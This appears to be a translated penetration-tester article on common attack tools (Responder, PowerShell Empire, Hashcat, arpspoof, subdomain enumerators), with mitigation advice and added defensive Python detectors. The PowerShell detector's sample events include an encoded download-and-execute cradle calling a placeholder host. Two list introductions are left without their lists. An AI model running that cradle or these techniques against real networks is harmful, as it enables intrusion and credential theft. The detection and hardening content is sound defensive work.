Top 5 utilities and techniques used by hackers

Hacker

Let's try a typical hacker situation.

It is Friday afternoon, and the hum of laptops is drowned out by rhythmic music from headphones plugged into a smartphone. The hash you found has still not been cracked, and the computer where the whole process is running has not been turned off since Tuesday morning. The second can of energy drink hits the edge of the trash can.

The ironed business-casual suit you are forced to wear begins to constrict your breathing as frustration builds. There are several hours left before you need to inform the client about the results of your work, but you have no desire to show up at the office before the task is completely solved.

Take a deep breath. It's time to put the work aside, go back to the beginning and try to look at the current situation from a new angle.

In the days of BackTrack and early versions of Kali Linux, the default desktop background carried the slogan "The quieter you get, the more you can hear" (which you would do well to change quickly, so as not to attract attention). It wasn't until I became a professional pentester that I understood the wisdom of this saying. Since technology is constantly evolving, once you have penetrated someone else's network you must quickly understand how that network works. Unfortunately, most network and system administrators, like ordinary people, have habits, and to find something interesting and valuable all we need to do is lie low and listen.

When it comes to penetration testing, there is a standoff between two groups. On one side, the pentester wants to find a vulnerability; on the other, the system administrator wants to show that the system is resistant to cyber attacks. In some ways this is like an amateur soccer match sponsored by a local pub. After the game, players from both teams spend time at the bar, but the thirst for winning has not gone anywhere. The difference between football and pentesting is that in a sports game the rules are transparent, and all participants know the strategy for achieving results.

There is no doubt that the task of the pentester is to safely simulate a realistic threat in order to identify risks. However, without a thorough understanding of the situation, it is difficult to come up with a good remedy. Sun Tzu once said:

"If you don't know your opponent or yourself, you will lose every battle."

To protect the network from cyber threats, every administrator must be familiar not only with their own tools but also with the tools of the enemy (at least at an informational level). Being in the dark is not the best way to go.

Introduction

In this article I will mainly try to answer the question "why", and only touch on the question "how". There are countless videos and tutorials that teach you how to use the tools, and they generally provide far more information than fits into a single article. I also admit that other experts may have a different opinion about the utilities mentioned here. The list is far from complete. If your opinion differs from mine, I will be happy to read your comments.

Now let's go directly to the description of the tools.

1. Responder

In my opinion, this utility is at the top of the list. When a researcher starts their work and talks about "limited functionality", this tool is the first thing that comes to mind. If you are a pentester, then after connecting to the network and starting to look for vulnerabilities, Responder is the first utility you need to run. The essence of Responder is to listen for traffic and spoof responses in the following protocols:
  • NBT-NS (NetBIOS Name Service)
  • LLMNR (Link-Local Multicast Name Resolution)
  • WPAD (Web Proxy Auto-Discovery)
Responder has other features, but I will focus only on these three protocols.

If you work as a system administrator, you may have heard of these protocols but can't remember where they came from. You may have seen references to them in Microsoft training literature that has long since lost relevance, or, depending on how long you have been in the field, you may even have configured them yourself.

NBT-NS is a relic of the past, left behind by Microsoft for compatibility so that applications that use NetBIOS can run on TCP/IP networks. LLMNR is similar to DNS and relies on multicast peer-to-peer communication for name resolution. This protocol appeared in the era of Windows Vista, which, as we understand, cannot bode well. Even if you have never encountered any of these concepts, packets of these protocols are travelling around your network, and both real and simulated attackers are well aware of it.

WPAD, on the other hand, solves a very specific task. Most corporate networks use a proxy auto-configuration (PAC) file to control host access to the Internet, and WPAD makes this control relatively simple. Computers on the network send out a broadcast looking for the host that serves the WPAD file and configure their proxy automatically. It is at this point that malicious activity can occur.

Security experts are well aware that most protocols that use broadcast or multicast communication in any form have weaknesses. From an attacker's perspective, one of the most common cases is credential theft: cracking the hashes obtained by capturing or relaying authentication "handshakes".

Unfortunately, system administrators mostly have their attention on the endless list of tasks related to keeping systems healthy. For the particularly busy, there are simple ways to protect against such threats, which boil down to disabling the relevant protocols. To distribute the proxy auto-configuration file, use more secure methods, such as Group Policy. I understand that the temptation to use automatic discovery of settings is great, but try to avoid these kinds of conveniences.
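Disabling the protocols is the fix; detecting a poisoner while you get there is the check. A well-known defensive trick is to resolve "canary" hostnames that do not exist anywhere: nobody legitimate can answer them, so any LLMNR answer for such a name points straight at the poisoner. The following Python is an added example (not code from the article or from Responder) that parses LLMNR responses, which reuse the DNS wire format, and flags answers for canary names. The canary names, the sample packets and the source addresses are constructed for the example.

```python
import struct

# Constructed canary names: hostnames that do not exist anywhere in DNS or AD
# (assumption: the defender has verified this), so any LLMNR answer for them
# can only come from a poisoner.
CANARY_NAMES = {"srv-canary-01", "wpad-decoy"}


def _encode_name(name):
    """Encode a hostname in DNS label format (LLMNR reuses the DNS wire format)."""
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def _decode_name(data, offset):
    """Decode a DNS-format name at offset, following compression pointers.
    Returns (name, offset just past the name in the original byte stream)."""
    labels = []
    end = None
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # two-byte compression pointer
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset if end is None else end


def parse_llmnr_response(data):
    """Parse an LLMNR response; return the queried name and any A-record answers."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000:
        raise ValueError("not a response (QR bit clear)")
    qname, offset = _decode_name(data, 12)
    offset += 4  # skip QTYPE and QCLASS
    addresses = []
    for _ in range(ancount):
        _aname, offset = _decode_name(data, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:  # A record
            addresses.append(".".join(str(b) for b in rdata))
    return {"id": txid, "name": qname, "addresses": addresses}


def build_llmnr_response(txid, name, ip):
    """Constructed sample response used only to exercise the parser; not a capture."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = _encode_name(name) + struct.pack("!HH", 1, 1)
    answer = (struct.pack("!H", 0xC00C)  # pointer to the question name at offset 12
              + struct.pack("!HHIH", 1, 1, 30, 4)
              + bytes(int(octet) for octet in ip.split(".")))
    return header + question + answer


def detect_poisoning(packets, canaries=CANARY_NAMES):
    """packets: iterable of (source_ip, raw_llmnr_payload).
    Returns one alert per host that answered a canary name."""
    alerts = []
    for src, data in packets:
        try:
            resp = parse_llmnr_response(data)
        except (ValueError, struct.error, IndexError):
            continue  # queries and malformed payloads are ignored
        if resp["name"].lower() in canaries:
            alerts.append({"poisoner": src, "name": resp["name"], "claims": resp["addresses"]})
    return alerts


# Constructed traffic: a legitimate answer for a real host, then a poisoned answer.
SAMPLE_PACKETS = [
    ("10.0.0.15", build_llmnr_response(0x0001, "printer01", "10.0.0.15")),
    ("10.0.0.66", build_llmnr_response(0x0002, "srv-canary-01", "10.0.0.66")),
]

if __name__ == "__main__":
    for alert in detect_poisoning(SAMPLE_PACKETS):
        print("LLMNR poisoning suspected:", alert)
```

In practice you would feed the parser the UDP/5355 payloads from a capture and have a scheduled task on a few workstations resolve the canary names regularly; the same idea works for NBT-NS, which differs only in its name encoding. The check reports the answering host, which is exactly the piece of information the IDS rules mentioned later in the article key on.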

2. PowerShell Empire

Before Empire became widely available, pentesters used an infrastructure based on C2 servers where the agent had to reside on disk. Such tools eventually became public, landed in VirusTotal and then in antivirus databases. Of course, there were and still are ways to bypass antivirus software, but such tricks often involve additional and very time-consuming fiddling. In fact, the confrontation between malware writers and antivirus vendors was an endless game of cat and mouse. That was the case until a method based on fileless agents appeared on the horizon and in many ways changed the rules of the game.

What happened can be compared to the collective subconscious of pentesters coming to the conclusion, at one point, that the most advanced tooling is already present on every modern workstation in the world. All that remained was to build a framework around it, which is what the Empire team did.

As a result, many frameworks and utilities used by pentesters during exploitation and post-exploitation began to adapt to PowerShell. Of course, real attackers could not stay away from this topic either.

If you look at the situation from a system administrator's perspective, this means exactly one thing: some security measures can be easily circumvented. Agents, including fileless malware, can be easily deployed using PowerShell. Such implants exist exclusively in memory, are not stored on the hard disk, and do not need USB media (although that route still works). These days, more and more malware lives exclusively in memory. At the end of this document you will find a link to an article that covers this topic in more detail. As a result, most antivirus programs, whose functionality is geared towards scanning files on disk, are becoming less effective, and the focus shifts to finding the source of the infection, which is often a macro in frequently changing office documents (Word/Excel).

The best protection against fileless malware is AppLocker or any other application-whitelisting solution. Of course, whitelisting takes time and will probably require buy-in from your company's management, but workstation security in general is moving in this direction. By adopting this technology you will find yourself at the forefront of current practice.

It is also worth analyzing how PowerShell is used on your systems. Can regular users run this tool, and if so, why?

When it comes to prevention, let me save you a lot of time right away. Restrictions based on the PowerShell execution policy are easily circumvented (see the "-ExecutionPolicy Bypass" flag).
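Since the execution policy will not stop anyone, the useful thing to do with it is to log it: a launcher that needs "-ExecutionPolicy Bypass", a hidden window and an encoded command at the same time is rarely an administrator doing routine work. The Python below is an added example (not from the article or from Empire) that triages process-creation command lines for exactly those indicators, decoding any -EncodedCommand payload (base64 of UTF-16LE text) so the real content can be inspected. The sample events are constructed, not real captures, and the URL is a reserved example address.

```python
import base64
import re

# Constructed command lines in the shape of process-creation events
# (Windows Security 4688 / Sysmon Event ID 1). Not real captures.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -ep bypass -enc " + _ENCODED,
    "powershell.exe Get-Service | Where-Object Status -eq Running",
]

# The switches a fileless launcher typically needs, including their short forms.
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+bypass", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-(?:WindowStyle|w)\s+hidden", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Strings worth a second look inside the (decoded) script body.
CONTENT_MARKERS = ("IEX", "Invoke-Expression", "DownloadString",
                   "Net.WebClient", "FromBase64String")


def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE text in base64; return it, or None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command_line(cmd):
    """Return the findings for one command line; a higher score means review it first."""
    findings = []
    if BYPASS_RE.search(cmd):
        findings.append("execution_policy_bypass")
    if HIDDEN_RE.search(cmd):
        findings.append("hidden_window")
    decoded = None
    match = ENCODED_RE.search(cmd)
    if match:
        findings.append("encoded_command")
        decoded = decode_encoded_command(match.group(1))
    body = (decoded or cmd).lower()  # inspect the decoded script when there is one
    findings.extend("content:" + m for m in CONTENT_MARKERS if m.lower() in body)
    return {"command": cmd, "decoded": decoded, "findings": findings, "score": len(findings)}


def triage_events(events):
    """Triage many events, most suspicious first."""
    return sorted((triage_command_line(e) for e in events), key=lambda r: -r["score"])


if __name__ == "__main__":
    for result in triage_events(SAMPLE_EVENTS):
        print(result["score"], result["findings"])
```

The first sample line (a signed backup script launched with the bypass flag) scores low and is the kind of thing a whitelist entry in AppLocker would document; the second line scores on every indicator. Command-line auditing (4688 with command-line logging, or Sysmon) and PowerShell script block logging are what make this data available in the first place.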

3. Hashcat and dictionaries

This pair is on my list entirely deservedly. Cracking hashes and recovering passwords is a fairly clear topic, so I won't spend much time on it.

Hashcat is a password cracker that works with GPUs and supports many hash formats. It is usually used with hashes obtained by Responder. In addition to Hashcat, you need a USB drive and several gigabytes of dictionaries. I use dictionary attacks on passwords during every pentest, but there is one subtlety here. Since password cracking can take a long time, you should choose the best trade-off between time spent and expected result.

Pentesters, if you are cracking passwords on a single laptop, that is the wrong approach. You need at least two, plus a good GPU to increase the chances of success.

Sysadmins, review your policies and configurations. It is good practice to follow industry standards such as the DISA STIGs. They cover a variety of operating systems and software, and contain key configuration settings that protect against offline password cracking and replay attacks. This may also include password policies recommended by the National Institute of Standards and Technology (NIST), non-standard authentication schemes, and much more. DISA even provides Group Policy templates that can be imported and adapted to your needs, which saves a lot of time. Still using NTLMv1? Passwords shorter than 8 characters? Then know that your system is very vulnerable.
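The point of the dictionary-versus-time trade-off is easiest to see from the defender's side: a password is weak either because it is in the dictionary or because its keyspace is small enough to exhaust. The Python below is an added example (not from the article, not from Hashcat, and not from NIST) of a policy check in the spirit of NIST SP 800-63B: a minimum length, a breached-password blocklist matched after stripping case and trailing digits or symbols, and a worst-case brute-force estimate. The blocklist is a constructed stand-in for the "several gigabytes of dictionaries", and the guessing rate is an assumption chosen for illustration, since the article gives no figure.

```python
import string

# Constructed stand-in for a breached-password list; real lists are far larger.
BLOCKLIST = {"password", "welcome", "welcome1", "summer", "company123", "qwerty", "letmein"}

# Assumed offline guessing rate against an unsalted fast hash (e.g. NTLM) on a
# modest GPU rig. Illustrative assumption, not a measurement.
ASSUMED_GUESSES_PER_SECOND = 10 ** 10


def charset_size(password):
    """Size of the alphabet an attacker must cover, from the character classes used."""
    size = 0
    if any(c in string.ascii_lowercase for c in password):
        size += 26
    if any(c in string.ascii_uppercase for c in password):
        size += 26
    if any(c in string.digits for c in password):
        size += 10
    if any(c not in string.ascii_letters + string.digits for c in password):
        size += 33  # printable ASCII symbols
    return size


def seconds_to_exhaust(password, rate=ASSUMED_GUESSES_PER_SECOND):
    """Worst-case time to exhaust the keyspace by brute force at the assumed rate.
    A dictionary hit needs none of this time, which is why the blocklist matters."""
    return charset_size(password) ** len(password) / rate


def policy_violations(password, min_length=8, blocklist=BLOCKLIST):
    """Length and blocklist check; the blocklist match ignores case and the
    trailing digits/symbols that users add to get past composition rules."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    base = password.lower()
    stripped = base.rstrip(string.digits + string.punctuation)
    if base in blocklist or stripped in blocklist:
        problems.append("matches breached-password blocklist")
    if len(set(password)) <= 2:
        problems.append("too repetitive")
    return problems


def audit(passwords):
    """Report per candidate: policy violations and brute-force estimate in days."""
    return {
        pw: {"violations": policy_violations(pw),
             "days_to_exhaust": seconds_to_exhaust(pw) / 86400}
        for pw in passwords
    }


if __name__ == "__main__":
    for pw, report in audit(["Welcome1!", "Abc123", "correct-horse-battery-staple"]).items():
        print(f"{pw!r}: {report}")
```

"Welcome1!" satisfies every classic composition rule and still fails, because stripping the trailing "1!" lands on a blocklisted word; that is the case the author's dictionaries catch in seconds. The brute-force estimate is only a ceiling: mask and rule-based attacks cover realistic passwords far faster than full enumeration, so treat the number as an upper bound on how much time an attacker would ever need.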

4. Tools for testing web applications

If you are a pentester, you will probably hear a familiar truism again. For everyone else, I would like to say that web application testing tools and vulnerability scanners are not the same thing.

Undoubtedly, vulnerability scanners (Nessus, Nexpose, Retina) can have web application testing functionality, and testing tools can have scanner functions, but I still recommend avoiding all-in-one thinking and not using a single class of utilities for everything. Testing tools focus on the application layer rather than on services and protocols; use them to test pages on internal and external networks. Vulnerability scanners, on the other hand, are better suited to testing and evaluating the security of ports, protocols, and services.

These days many organizations deploy enterprise web applications, intranet sites, and reporting systems. The assumption is that since the site is used exclusively for internal purposes there is no need to review the code for security, and access can be granted to all users. Sooner or later this approach leads to exploitable vulnerabilities.

Personally, during pentests I first try to find obvious vulnerabilities related to misconfigured services and hosts with outdated software. If that search is unsuccessful, I go up a level and start testing the web application. Since this area is extremely vast, you can always find something incriminating. Here are some of the most frequently found classes of flaws:
If you work as a system administrator in an organization that uses internal web applications, analyze how often code reviews take place. Code reuse causes problems, especially when code imported from unknown sources brings security holes and potentially malicious functionality with it. Moreover, the "Always Be Shipping" methodology has become increasingly popular in software development. Its essence is that the main emphasis is on shipping working code rather than assuming that flaws can always exist.

Check out the OWASP project, which focuses entirely on secure application development. Analyze your Software Development Lifecycle (SDLC) to see whether it contains stages associated with application security testing. OWASP provides some recommendations on this topic.

Check out two application testing methodologies:
In addition, I recommend checking applications at least once a quarter using various utilities and scanners: Burp Suite Pro, OWASP Zed Attack Proxy (ZAP), Acunetix, Trustwave, and so on.

5. Arpspoof and Wireshark

At the beginning of the article I mentioned that you need to look at the situation from a new angle. This pair of utilities illustrates exactly what was meant.

Arpspoof allows the pentester to get between the victim and the gateway, and Wireshark captures packets from the interface for later analysis. Roughly speaking, during a pentest you redirect traffic from the victim (for example, a workstation) through yourself and then analyze the content of the intercepted traffic. Sometimes it is enough to understand who is talking to whom and intercept some data in clear text to get something interesting.

From the moment the first theoretical concepts were presented, man-in-the-middle (MiTM) attacks have remained effective, and they still are in modern networks. Given that the vast majority of internal networks currently use IPv4 (a state of affairs that will not change soon), and given the design of the ARP protocol, this MiTM attack will remain relevant.

Many people mistakenly assume that if communication takes place inside the network, that fact alone guarantees security, and that there is no need to use encryption inside subnets. Even if your network is isolated from the Internet, no one can guarantee that an attacker will not get in from the outside and tap into your communications.

By the same logic, we can assume that a workstation will be compromised by an attacker from another country using a Trojan that makes a MiTM attack possible. An alternative and more realistic scenario involves an insider threat: for example, an employee with technical knowledge and not entirely pure intentions who watched a few YouTube videos and decided to befriend the secretary, for whom he has "suddenly" developed a fondness. Insider threats are relevant, especially in organizations whose leaders are well known and very rich. Remember that envy often pushes people to rash actions.

Now let's talk about security methods.

Encrypt communications even on internal networks. It is a mistake to assume that communications within the network are protected simply because the gateway is not connected to the Internet. All client-server applications should encrypt their traffic whenever possible.

VLAN segments must be properly designed, and the entire network must be protected from unauthorized devices. You may need to implement Network Access Control (NAC) or the 802.1X standard. Disable unused switch ports and consider sticky MAC addresses (port security) if you're on a tight budget.

Have you ever thought about deploying an IDS? There are free and open-source options that let you evaluate one, for example Security Onion. IDS rules are designed to detect abnormal network activity, which may, for example, indicate an attempt at ARP cache poisoning. Try to implement such tools if you have the necessary resources and, of course, the approval of your superiors. As a trial step, you can also try out honeypot systems; open-source options are available here too, for example Honeyd.
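What an IDS rule for ARP cache poisoning actually looks for is simple enough to show in full. On the wire, arpspoof is a stream of unsolicited ARP replies in which a third MAC address claims the gateway's IP and then the victim's IP. The Python below is an added example (not from the article, Arpspoof, Wireshark or Security Onion) of the bookkeeping behind such a rule, in the style of arpwatch: it tracks IP-to-MAC bindings and raises an alert when a binding changes, when a static inventory is contradicted, or when one MAC answers for several IPs. The ARP records and the inventory are constructed, not a real capture.

```python
# Constructed ARP replies (timestamp, sender IP, sender MAC) in the shape a
# Wireshark/tshark capture would show; not a real capture. The last two records
# are what poisoning of the 10.0.0.1 <-> 10.0.0.20 pair looks like from the wire.
SAMPLE_ARP_REPLIES = [
    (0.0, "10.0.0.1", "00:11:22:33:44:01"),   # gateway
    (0.5, "10.0.0.20", "00:11:22:33:44:20"),  # workstation
    (1.0, "10.0.0.1", "00:11:22:33:44:01"),
    (2.0, "10.0.0.1", "de:ad:be:ef:00:99"),   # gateway IP claimed by a third MAC
    (2.1, "10.0.0.20", "de:ad:be:ef:00:99"),  # the same MAC also claims the workstation
]


class ArpMonitor:
    """Track IP->MAC bindings seen in ARP replies and alert on the signatures of
    cache poisoning. `trusted` is an optional static inventory (assumption: the
    defender maintains one for gateways and servers)."""

    def __init__(self, trusted=None):
        self.trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.bindings = {}  # ip -> last MAC seen claiming it
        self.alerts = []

    def _alert(self, ts, kind, ip, mac):
        self.alerts.append({"time": ts, "kind": kind, "ip": ip, "mac": mac})

    def observe(self, ts, ip, mac):
        mac = mac.lower()
        # 1. A reply contradicting the static inventory is always suspicious.
        if ip in self.trusted and self.trusted[ip] != mac:
            self._alert(ts, "trusted_binding_violated", ip, mac)
        # 2. A binding that changes is suspicious but noisy (DHCP churn, VRRP failover).
        previous = self.bindings.get(ip)
        if previous is not None and previous != mac:
            self._alert(ts, "binding_changed", ip, mac)
        self.bindings[ip] = mac
        # 3. One MAC answering for several IPs is the classic man-in-the-middle shape.
        claimed = sorted(i for i, m in self.bindings.items() if m == mac)
        if len(claimed) > 1:
            self._alert(ts, "mac_claims_multiple_ips", ",".join(claimed), mac)

    def replay(self, replies):
        for ts, ip, mac in replies:
            self.observe(ts, ip, mac)
        return self.alerts


def analyze(replies, trusted=None):
    """Run a fresh monitor over a list of replies and return its alerts."""
    return ArpMonitor(trusted).replay(replies)


if __name__ == "__main__":
    inventory = {"10.0.0.1": "00:11:22:33:44:01"}
    for alert in analyze(SAMPLE_ARP_REPLIES, trusted=inventory):
        print(alert)
```

The first three records produce nothing; everything fires from the moment the third MAC appears. Of the three signals, "binding_changed" alone is not enough to page anyone, since DHCP reassignments and router failover also change bindings; the combination with a contradicted inventory entry or with one MAC claiming several hosts is what makes the alert actionable.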

Subdomain enumerators

I decided to highlight subdomain enumerators separately, since this topic does not fully overlap with any of the utilities above, but it deserves consideration. If you read the r/netsec feed, you have probably noticed that a lot of subdomain enumerators and brute-forcers have appeared recently.

Why is this topic relevant?

Regardless of who is trying to break into your network, a hired pentester or an attacker, reconnaissance takes 80% of the time, and usually the first step is enumerating subdomains. An attacker doesn't even need to touch your systems to understand your points of contact with the World Wide Web. Utilities like Fierce make this work much easier.

Sysadmins, if I asked you how much of your environment is visible from the Internet, would you be able to answer? What ports and protocols are reachable from the outside? Are web consoles exposed? Run a Whois lookup on your organization's main domain, registered with a popular registrar (Network Solutions, GoDaddy, etc.), and analyze the names, postal addresses and email addresses that come back. If the list includes real names and addresses, that information alone may already be enough for attackers. You can also use the Shodan search engine to find all exposed devices: enter your external IP addresses and take a look at the results, which are available to everyone.
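The way to answer the "how visible are you" question before someone else does is to run the same passive enumeration against yourself and diff it against what you think you own. Certificate Transparency logs are one public source every subdomain enumerator uses. The Python below is an added example (not from the article or from Fierce) that extracts the hostnames under your apex domain from a CT export and reports the ones missing from your asset inventory, plus inventory entries that no longer show up. The input is a constructed sample in the shape of crt.sh's JSON export (a list of objects with a newline-separated "name_value" field, which is an assumption about that service), and the domain, names and inventory are made up.

```python
import json

# Constructed sample in the shape of crt.sh's JSON export. The shape is an
# assumption about that service; the names are made up.
SAMPLE_CT_JSON = json.dumps([
    {"name_value": "www.example.com\nexample.com"},
    {"name_value": "*.dev.example.com"},
    {"name_value": "vpn.example.com"},
    {"name_value": "old-jenkins.example.com"},
    {"name_value": "WWW.Example.com"},
    {"name_value": "example.com.evil.invalid"},   # lookalike under someone else's zone
])

# Constructed asset inventory: what the defender believes is exposed.
KNOWN_ASSETS = {"example.com", "www.example.com", "vpn.example.com",
                "legacy-portal.example.com"}


def names_from_ct(raw_json, apex):
    """Extract normalized hostnames under `apex` from a CT log JSON export."""
    apex = apex.lower()
    names = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]  # a wildcard cert still reveals the parent zone
            # Suffix match on ".apex" keeps lookalike domains out.
            if name == apex or name.endswith("." + apex):
                names.add(name)
    return names


def unknown_exposures(ct_names, known_assets):
    """Hostnames that are publicly visible but missing from the inventory."""
    return sorted(ct_names - {a.lower() for a in known_assets})


def stale_inventory(ct_names, known_assets):
    """Inventory entries with no public certificate: candidates for cleanup or review."""
    return sorted({a.lower() for a in known_assets} - ct_names)


if __name__ == "__main__":
    seen = names_from_ct(SAMPLE_CT_JSON, "example.com")
    print("not in inventory:", unknown_exposures(seen, KNOWN_ASSETS))
    print("in inventory only:", stale_inventory(seen, KNOWN_ASSETS))
```

The two names that surface here, a forgotten CI server and a wildcard for a development zone, are exactly the kind of host an enumerator hands to an attacker as a starting point. Run the same diff on a schedule against whichever passive sources you trust, and pair it with the Shodan and Whois checks above for the IP and contact-information side of the picture.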

Let me give you an example. If you're a system administrator and don't know who Phineas Fisher is, I wouldn't be surprised. But if you're a pentester and don't know who that person is, you should be ashamed of yourself.

In 2016 the Milan-based Hacking Team was known as a manufacturer of cyber weapons for governments around the world. These friends were hacked by a person under the pseudonym mentioned above. As a result, a huge amount of data was leaked, and one of the most detailed write-ups of a real intrusion appeared. Take a look at Step 2 of that write-up, called "Subdomain Enumeration". I will not comment on the ethics of this exercise, but regardless of which side you are on, the details described by Phineas Fisher are of great value to security professionals and system administrators, because they show how an attacker thinks.

Sun Tzu said the following:

"If you know the enemy and yourself, you don't have to worry about the outcome of a hundred battles."
 